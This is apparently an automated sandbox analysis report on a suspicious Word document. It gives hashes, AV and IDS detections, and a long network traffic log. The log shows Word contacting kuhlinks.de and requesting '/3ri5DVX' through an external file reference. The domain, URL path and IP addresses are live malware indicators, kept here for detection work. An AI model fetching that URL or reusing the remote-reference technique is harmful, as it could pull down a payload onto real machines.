
Windows Analysis Report
IMP 7527518303 2507294.docx.doc

Overview

General Information

Sample name: IMP 7527518303 2507294.docx.doc
Analysis ID: 1654507
MD5: c8675988aa2bc47338861b4d62aa517d
SHA1: 67366589c5fbfa1153aa10a3d06b88d12719cdca
SHA256: 315b8754f30097fb04f76e09719a8415c53103a8c8abd6c7e988a918a2791476
Tags: docuser-lowmal3

Detection

Score: 60
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains an external reference to another file
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

[Classification chart; categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious]
  • System is w11x64_office
  • WINWORD.EXE (PID: 7312 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • cleanup
No configs have been found
No yara matches
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 60832, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7312, Protocol: tcp, SourceIp: 172.67.144.140, SourceIsIpv6: false, SourcePort: 443
Timestamp                        SID      Severity  Classtype                Source IP     Source Port  Destination IP  Destination Port  Protocol
2025-04-02T12:00:42.919911+0200  1810004  1         Potentially Bad Traffic  192.168.2.24  60838        172.67.144.140  443               TCP
2025-04-02T12:00:43.414685+0200  1810004  1         Potentially Bad Traffic  192.168.2.24  60840        216.9.224.185   80                TCP

Timestamp                        SID      Severity  Classtype                Source IP     Source Port  Destination IP  Destination Port  Protocol
2025-04-02T12:00:40.599604+0200  1810005  1         Potentially Bad Traffic  192.168.2.24  60833        172.67.144.140  443               TCP

AV Detection

Source: IMP 7527518303 2507294.docx.doc | Virustotal: Detection: 13%
Source: IMP 7527518303 2507294.docx.doc | ReversingLabs: Detection: 16%
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 172.67.144.140:443 -> 192.168.2.24:60832 version: TLS 1.2
Source: global traffic | DNS query: name: kuhlinks.de
Source: global traffic | DNS query: name: 185.224.9.216.in-addr.arpa
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60832 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60832
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60833 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60833
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60834 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60834
Source: global traffic | TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global traffic | TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global traffic | TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60838 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60838
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60843 -> 172.67.144.140:443
Source: global traffic | TCP traffic: 172.67.144.140:443 -> 192.168.2.24:60843
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global traffic | TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60836 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60836
Source: global traffic | TCP traffic: 216.9.224.185:80 -> 192.168.2.24:60840
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80
Source: global traffic | TCP traffic: 192.168.2.24:60840 -> 216.9.224.185:80

Networking

Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:60840 -> 216.9.224.185:80
Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:60838 -> 172.67.144.140:443
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.24:60833 -> 172.67.144.140:443
Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /3ri5DVX HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: kuhlinks.deConnection: Keep-Alive
